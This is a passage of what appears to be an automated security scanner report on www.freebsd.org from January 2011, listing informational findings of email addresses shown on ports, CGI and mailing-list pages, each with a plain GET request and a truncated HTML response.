GET /cgi/cvsweb.cgi/ports/www/pnews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/www/pnews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.287. http://www.freebsd.org/cgi/pds.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/pds.cgi

Issue detail

The following email address was disclosed in the response:

ports@FreeBSD.org

Request

GET /cgi/pds.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>FreeBSD Ports downlo
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.288. http://www.freebsd.org/cgi/ports.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/ports.cgi

Issue detail

The following email addresses were disclosed in the response:

ports@FreeBSD.org
www@FreeBSD.org

Request

GET /cgi/ports.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:39:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>FreeBSD Ports Search
...[SNIP]...
<a href="mailto:www@FreeBSD.org">www@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:ports@FreeBSD.org"><i>ports@FreeBSD.org</i>
...[SNIP]...
<a href='../mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.289. http://www.freebsd.org/cgi/search.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/search.cgi

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/search.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:31 GMT
Server: Apache/1.3.x Sausalito (Unix)
Content-Type: text/html
Connection: close
Content-Length: 6140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Mail Archive Search<
...[SNIP]...
<a href='../mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.290. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

dougb@FreeBSD.org
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/mail/alpine/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.291. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

mich@FreeBSD.org
newspost@unixcab.org
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/newspost/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.292. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

miki@ceti.pl
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/yydecode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.293. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

ports@FreeBSD.org
wizard@vlink.ru

Request

GET /cgi/url.cgi?ports/news/gup/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
Update Program is a Unix mail-server that lets a remote
site change their newsgroups subscription without requiring the
intervention of the news administrator at the feed site.

-- Denis Shaposhnikov
wizard@vlink.ru
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.294. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

john@zoner.org
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/ubh/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.295. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

ehaupt@critical.ch
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/brag/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.296. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

ggr@usenix.org
ports@FreeBSD.org
prz@acm.org

Request

GET /cgi/url.cgi?ports/news/pgpmoose/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<pre>
PGP Moose / by Greg Rose <ggr@usenix.org>
...[SNIP]...
to use others, such as
the Digital Signature Standard. PGP was chosen for
its widespread availability around the world.
PGP, the crux of the cryptographic software, was
written by Phil Zimmermann <prz@acm.org>, who
otherwise has nothing to do with this. The
cryptographic framework was written by Greg Rose
<ggr@usenix.org>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.297. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

pfeifer@ls6.informatik.uni-dortmund.de
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/p5-NNML/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<pre>
NNML::Server server implements a minimal NNTP server. It is (hope-)
fully conformant to rfc977. In addition the commands XOVER and
AUTHINFO are implemented.

Author: Ulrich Pfeifer <pfeifer@ls6.informatik.uni-dortmund.de>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.298. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

fox@roestock.demon.co.uk
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/slurp/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:33 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
r local news system or
forwarding on via UUCP to another news system. It replaces nntpxfer
from the NNTP 1.5.12 reference implementation and nntpget from the INN
distribution.

Patches from Peter Fox (fox@roestock.demon.co.uk) have been added to
avoid downloading articles from certain sites. To make use of this
facility, create a file ${PREFIX}/news/lib/excludesites and list the
sites in it, eg

fritter.spam.com
hackers.o
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.299. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

ports@FreeBSD.org
skv@FreeBSD.org

Request

Response

24.300. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

jooji@nickelkid.com
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/nn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

- Jasper O'Malley
jooji@nickelkid.com
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.301. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

obrien@NUXI.com
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/aub/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.302. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

egoshin@ihep.su
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/nntpbtr/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<pre>
nntpbtr is high-throughput, well-buffered, crash-reliable, all-terrains
NNTP Bulk TRanfer program, written by Leonid Yegoshin <egoshin@ihep.su>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.303. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

fehlner@gmx.de
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/sn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.304. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

pjenvey@groovie.org
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/hellanzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.305. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:

petef@FreeBSD.org
ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/slrn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.306. http://www.freebsd.org/community/mailinglists.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/community/mailinglists.html

Issue detail

The following email addresses were disclosed in the response:

bsd-owner@lists.bsd.lv
bsd@hu.FreeBSD.org
bsd@nobug.no
bus@stacken.kth.se
freebsd-subscribe@fug.com.br
freebsd@lists.enderunix.org
freebsd@npf.pt.freebsd.org
id-freebsd-subscribe@egroups.com
listserver@FreeBSD-fr.org
maillist@opennet.ru
mailman-owner@gufi.org
majordomo@bsdguru.org
majordomo@jp.FreeBSD.org
majordomo@kr.FreeBSD.org
majordomo@nl.FreeBSD.org
majordomo@sk.FreeBSD.org
users-l-request@FreeBSD.cz

Request

GET /community/mailinglists.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3146088003"
Last-Modified: Fri, 31 Dec 2010 18:24:30 GMT
Content-Length: 9654
Connection: close
Date: Mon, 24 Jan 2011 16:39:35 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a
href="mailto:freebsd-subscribe@fug.com.br">freebsd-subscribe@fug.com.br</a>
...[SNIP]...
<a
href="mailto:users-l-request@FreeBSD.cz">users-l-request@FreeBSD.cz</a>
...[SNIP]...
<a
href="mailto:listserver@FreeBSD-fr.org">listserver@FreeBSD-fr.org</a>
...[SNIP]...
<a
href="mailto:bsd@hu.FreeBSD.org">bsd@hu.FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:id-freebsd-subscribe@egroups.com">id-freebsd-subscribe@egroups.com</a>
...[SNIP]...
<a
href="mailto:mailman-owner@gufi.org">mailman-owner@gufi.org</a>
...[SNIP]...
<a
href="mailto:majordomo@jp.FreeBSD.org">majordomo@jp.FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:majordomo@kr.FreeBSD.org">majordomo@kr.FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:bsd-owner@lists.bsd.lv">bsd-owner@lists.bsd.lv</a>
...[SNIP]...
<a
href="mailto:majordomo@nl.FreeBSD.org">majordomo@nl.FreeBSD.org</a>
...[SNIP]...
<a href="mailto:bsd@nobug.no">bsd@nobug.no</a>
...[SNIP]...
<a
href="mailto:majordomo@bsdguru.org">majordomo@bsdguru.org</a>
...[SNIP]...
<a
href="mailto:freebsd@npf.pt.freebsd.org">freebsd@npf.pt.freebsd.org</a>
...[SNIP]...
<a
href="mailto:maillist@opennet.ru">maillist@opennet.ru</a>
...[SNIP]...
<a
href="mailto:majordomo@sk.FreeBSD.org">majordomo@sk.FreeBSD.org</a>
...[SNIP]...
<a
href="mailto:bus@stacken.kth.se">bus@stacken.kth.se</a>
...[SNIP]...
<a
href="mailto:freebsd@lists.enderunix.org">freebsd@lists.enderunix.org</a>
...[SNIP]...

24.307. http://www.freebsd.org/events/events.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/events/events.html

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /events/events.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "4277815952"
Last-Modified: Sun, 23 Jan 2011 00:03:02 GMT
Content-Length: 25411
Connection: close
Date: Mon, 24 Jan 2011 16:39:37 GMT
Server: httpd/1.4.x LaHonda

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<a href="mailto:www@FreeBSD.org">www@FreeBSD.org</a>
...[SNIP]...

24.308. http://www.freebsd.org/mailto.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/mailto.html

Issue detail

The following email addresses were disclosed in the response:

freebsd-doc@FreeBSD.org
freebsd-questions@FreeBSD.org

Request

GET /mailto.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2773185839"
Last-Modified: Fri, 31 Dec 2010 18:24:30 GMT
Content-Length: 7151
Connection: close
Date: Mon, 24 Jan 2011 16:19:03 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a href="mailto:freebsd-questions@FreeBSD.org">freebsd-questions@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:freebsd-doc@FreeBSD.org">freebsd-doc@FreeBSD.org</a>
...[SNIP]...

24.309. http://www.freebsd.org/ports/archivers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/archivers.html

Issue detail

The following email addresses were disclosed in the response:

ache@FreeBSD.org
acm@FreeBSD.org
admin@lissyara.su
afb@rpm5.org
ale@FreeBSD.org
andreevmaxim@gmail.com
avl@FreeBSD.org
ayu@commun.jp
bf@FreeBSD.org
c-s@c-s.li
c0rn@o2.pl
clsung@FreeBSD.org
csjp@FreeBSD.org
danfe@FreeBSD.org
davide.italiano@gmail.com
demon@FreeBSD.org
den@FreeBSD.org
dinoex@FreeBSD.org
ehaupt@FreeBSD.org
emulation@FreeBSD.org
f3cun3c02@sneakemail.com
fjoe@FreeBSD.org
gabor@FreeBSD.org
garga@FreeBSD.org
glewis@FreeBSD.org
gnome@FreeBSD.org
gslin@gslin.org
haskell@FreeBSD.org
jaapb@kerguelen.org
jadawin@FreeBSD.org
jharris@widomaker.com
johans@FreeBSD.org
jonny@jonny.eng.br
kevlo@FreeBSD.org
knu@FreeBSD.org
koziol@hdfgroup.org
kuriyama@FreeBSD.org
lioux@FreeBSD.org
maho@FreeBSD.org
makc@FreeBSD.org
mandree@FreeBSD.org
mark@mkproductions.org
markand@malikania.fr
martymac@FreeBSD.org
miwi@FreeBSD.org
mm@FreeBSD.org
naddy@FreeBSD.org
naylor.b.david@gmail.com
nox@FreeBSD.org
olgeni@FreeBSD.org
onatan@gmail.com
pav@FreeBSD.org
perl@FreeBSD.org
pirzyk@freebsd.org
ports@FreeBSD.org
ports@c0decafe.net
rodrigo@bebik.net
ruby@FreeBSD.org
samm@os2.kiev.ua
sbrabez@gmail.com
sec@42.org
skv@FreeBSD.org
stas@FreeBSD.org
stefan@FreeBSD.org
sunpoet@FreeBSD.org
swhetzel@gmail.com
sylvio@FreeBSD.org
tarkhil@over.ru
toxic@doobie.com
wenheping@gmail.com
yarodin@gmail.com

Request

GET /ports/archivers.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3287887936"
Last-Modified: Sun, 23 Jan 2011 02:29:29 GMT
Content-Length: 230320
Connection: close
Date: Mon, 24 Jan 2011 16:16:38 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Archivers</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="te
...[SNIP]...
<A HREF="mailto:rodrigo@bebik.net">rodrigo@bebik.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jharris@widomaker.com">jharris@widomaker.com</A>
...[SNIP]...
<A HREF="mailto:gabor@FreeBSD.org">gabor@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tarkhil@over.ru">tarkhil@over.ru</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:csjp@FreeBSD.org">csjp@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pirzyk@freebsd.org">pirzyk@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:maho@FreeBSD.org">maho@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stefan@FreeBSD.org">stefan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gabor@FreeBSD.org">gabor@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:naddy@FreeBSD.org">naddy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:naddy@FreeBSD.org">naddy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gabor@FreeBSD.org">gabor@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wenheping@gmail.com">wenheping@gmail.com</A>
...[SNIP]...
<A HREF="mailto:koziol@hdfgroup.org">koziol@hdfgroup.org</A>
...[SNIP]...
<A HREF="mailto:koziol@hdfgroup.org">koziol@hdfgroup.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gabor@FreeBSD.org">gabor@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glewis@FreeBSD.org">glewis@FreeBSD.org</A>
...[SNIP]...
